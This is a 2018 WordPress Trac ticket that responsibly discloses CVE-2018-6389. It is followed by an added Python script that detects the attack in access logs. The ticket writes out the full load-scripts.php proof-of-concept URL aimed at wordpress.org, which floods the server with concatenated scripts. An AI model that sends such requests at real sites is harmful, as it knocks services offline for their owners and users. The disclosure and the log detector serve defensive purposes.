[wp-trac] [WordPress Trac] #44943: Using component with Known Vulnerability - Unpatched WordPress leading to DoS
WordPress Trac
noreply at wordpress.org
Fri Sep 14 05:52:57 UTC 2018
#44943: Using component with Known Vulnerability - Unpatched WordPress leading to
DoS
------------------------------+-----------------------------
Reporter: frontdoorpentest | Owner: (none)
Type: defect (bug) | Status: new
Priority: normal | Milestone: Awaiting Review
Component: General | Version:
Severity: normal | Keywords:
Focuses: |
------------------------------+-----------------------------
I would like to report a vulnerability that is categorized under
"A9:2017-Using Components with Known Vulnerabilities" and can lead to
denial of service.
Please read the report before marking it as not valid because of DoS
(Note:- there has been no attempt made to DoS the freshbooks web
application).
Vulnerability:- https://wordpress.org/ uses WordPress as a backend engine
to run its web application, and using CVE-2018-6389 an anonymous user can
cause denial of service. In this vulnerability an attacker will pass all
the possible JavaScript libraries, and the application tries to load all the
functions and send them back in the response. Passing a large list of JS
functions can consume a lot of processing to respond, and if done from
various locations/IPs/browser tabs it can lead to DoS. This attack can
generate a response of up to 3 MB per request.
Url :- https://wordpress.org/wp-admin/load-scripts.php?load=eutil,common
,wp-a11y,sack,quicktag,colorpicker,editor,wp-fullscreen-stu,wp-ajax-
response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-
lists,prototype,scriptaculous-root,scriptaculous-builder,scriptaculous-
dragdrop,scriptaculous-effects,scriptaculous-slider,scriptaculous-sound
,scriptaculous-controls,scriptaculous,cropper,jquery,jquery-core,jquery-
migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-
effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-
explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight
,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-
effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-
transfer
Possible fixes:-
1. change default "admin" directory name (Security through obscurity)
2. or apply some password protection to /wp-admin/ url
Impact:-
DoS of the site and application server
Please find the attached screenshot demonstrating the PoC.
Reference:-
https://hackerone.com/reports/335177
https://baraktawily.blogspot.com/2018/02/how-to-dos-29-of-world-wide-websites.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389
Note:- My intention was never to hamper this platform in any manner; I just
wanted to report in a responsible way.
--
Ticket URL: <https://core.trac.wordpress.org/ticket/44943>
WordPress Trac <https://core.trac.wordpress.org/>
WordPress publishing platform
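Added example, not part of the ticket and not WordPress code: a log check for the request pattern the report describes, counting the script handles passed to /wp-admin/load-scripts.php and flagging requests with an unusually long list or a very large response. The thresholds, the combined-log regex and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Combined/common access-log prefix: client IP, request target, response size.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3} (\d+|-)')
MAX_HANDLES = 20       # assumed threshold; tune against your own admin traffic
MAX_BYTES = 1_000_000  # assumed threshold for one concatenated response

def count_handles(target):
    """Distinct script handles requested from load-scripts.php (0 for other paths)."""
    parts = urlsplit(target)
    if not parts.path.endswith("/wp-admin/load-scripts.php"):
        return 0
    handles = set()
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        # Accept load=... (as in the report) and the array forms load[]=... / load[chunk_0]=...
        if key == "load" or key.startswith("load["):
            handles.update(h.strip() for h in value.split(",") if h.strip())
    return len(handles)

def flag_requests(log_text):
    """Return (client_ip, handle_count, response_bytes) for each suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, target, size = m.groups()
        n = count_handles(target)
        nbytes = 0 if size == "-" else int(size)
        if n > MAX_HANDLES or (n and nbytes > MAX_BYTES):
            hits.append((ip, n, nbytes))
    return hits

# Constructed sample data: placeholder handle names and documentation-range IPs.
_MANY = ",".join(f"handle{i}" for i in range(25))
SAMPLE_LOG = "\n".join([
    '203.0.113.7 - - [14/Sep/2018:05:50:01 +0000] "GET /wp-admin/load-scripts.php'
    '?c=1&load%5B%5D=jquery-core,jquery-migrate,utils&ver=4.9 HTTP/1.1" 200 97184',
    '198.51.100.9 - - [14/Sep/2018:05:50:02 +0000] "GET /wp-admin/load-scripts.php'
    f'?load={_MANY} HTTP/1.1" 200 3012554',
    '198.51.100.9 - - [14/Sep/2018:05:50:03 +0000] "GET /wp-login.php HTTP/1.1" 200 2310',
])

if __name__ == "__main__":
    for hit in flag_requests(SAMPLE_LOG):
        print(hit)
```

Grouping the flagged tuples by client IP over a time window gives a rate signal that can feed a rate limit or access restriction on /wp-admin/.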